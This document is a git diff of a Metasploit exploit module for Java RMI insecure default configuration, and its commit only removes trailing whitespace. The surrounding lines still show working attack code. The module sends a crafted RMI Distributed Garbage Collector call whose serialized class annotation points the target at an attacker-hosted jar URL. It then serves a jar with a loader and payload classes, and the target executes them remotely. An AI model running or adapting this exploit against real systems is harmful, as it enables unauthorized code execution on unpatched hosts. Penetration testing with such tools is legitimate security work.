Delete extra spaces
parent
e6fbca716c
commit
c60fa496c7
|
@ -16,13 +16,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Java RMI Server Insecure Default Configuration Java Code Execution',
|
||||
'Description' => %q{
|
||||
This module takes advantage of the default configuration of the RMI Registry and
|
||||
RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it
|
||||
RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it
|
||||
invokes a method in the RMI Distributed Garbage Collector which is available via every
|
||||
RMI endpoint, it can be used against both rmiregistry and rmid, and against most other
|
||||
RMI endpoint, it can be used against both rmiregistry and rmid, and against most other
|
||||
(custom) RMI endpoints as well.
|
||||
|
||||
Note that it does not work against Java Management Extension (JMX) ports since those do
|
||||
not support remote class loading, unless another RMI endpoint is active in the same
|
||||
not support remote class loading, unless another RMI endpoint is active in the same
|
||||
Java process.
|
||||
|
||||
RMI method calls do not support or require any sort of authentication.
|
||||
|
@ -32,14 +32,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
# RMI protocol specification
|
||||
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
|
||||
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
|
||||
# Placeholder reference for matching
|
||||
[ 'MSF', 'java_rmi_server']
|
||||
[ 'MSF', 'java_rmi_server']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 15 2011',
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
register_options([
|
||||
Opt::RPORT(1099),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
], self.class)
|
||||
register_common_rmi_ports_and_services
|
||||
end
|
||||
|
@ -91,18 +91,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, re-raise
|
||||
# When the server stops due to our timeout, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delay
|
||||
raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
|
||||
raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
|
||||
rescue Msf::Exploit::Failed
|
||||
# When the server stops due primer failing, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delays
|
||||
raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
|
||||
rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
|
||||
raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
|
||||
rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
|
||||
# When the primer fails due to an error connecting with
|
||||
# the rhost, re-raise RuntimeError so it won't wait the
|
||||
# full wfs_delays
|
||||
raise ::RuntimeError, e.message
|
||||
raise ::RuntimeError, e.message
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_header
|
||||
ack = recv_protocol_ack
|
||||
if ack.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
|
||||
end
|
||||
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
|
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# JDK 1.1 stub protocol
|
||||
# Interface hash: 0xf6b6898d8bf28643 (sun.rmi.transport.DGCImpl_Stub)
|
||||
# Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))
|
||||
# Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))
|
||||
send_call(
|
||||
object_number: 2,
|
||||
uid_number: 0,
|
||||
|
@ -180,12 +180,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
p = regenerate_payload(cli)
|
||||
jar = p.encoded_jar
|
||||
paths = [
|
||||
[ "metasploit", "RMILoader.class" ],
|
||||
[ "metasploit", "RMIPayload.class" ],
|
||||
[ "metasploit", "RMILoader.class" ],
|
||||
[ "metasploit", "RMIPayload.class" ],
|
||||
]
|
||||
jar.add_files(paths, MetasploitPayloads.path('java'))
|
||||
jar.add_files(paths, MetasploitPayloads.path('java'))
|
||||
|
||||
send_response(cli, jar.pack,
|
||||
send_response(cli, jar.pack,
|
||||
{
|
||||
'Content-Type' => 'application/java-archive',
|
||||
'Connection' => 'close',
|
||||
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
new_array_super.description = Rex::Java::Serialization::Model::NullReference.new
|
||||
|
||||
new_array_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
||||
new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')
|
||||
new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')
|
||||
new_array_desc.serial_version = 0x871300b8d02c647e
|
||||
new_array_desc.flags = 2
|
||||
new_array_desc.fields = []
|
||||
|
@ -259,13 +259,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||
|
||||
new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
||||
new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')
|
||||
new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')
|
||||
new_class_desc.serial_version = 0xa16544ba26f9c2f4
|
||||
new_class_desc.flags = 2
|
||||
new_class_desc.fields = []
|
||||
new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
||||
new_class_desc.class_annotation.contents = [
|
||||
Rex::Java::Serialization::Model::Utf.new(nil, jar_url),
|
||||
Rex::Java::Serialization::Model::Utf.new(nil, jar_url),
|
||||
Rex::Java::Serialization::Model::EndBlockData.new
|
||||
]
|
||||
new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
||||
|
@ -278,7 +278,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
arguments << new_object
|
||||
|
||||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")
|
||||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")
|
||||
|
||||
arguments
|
||||
end
|
||||
|
|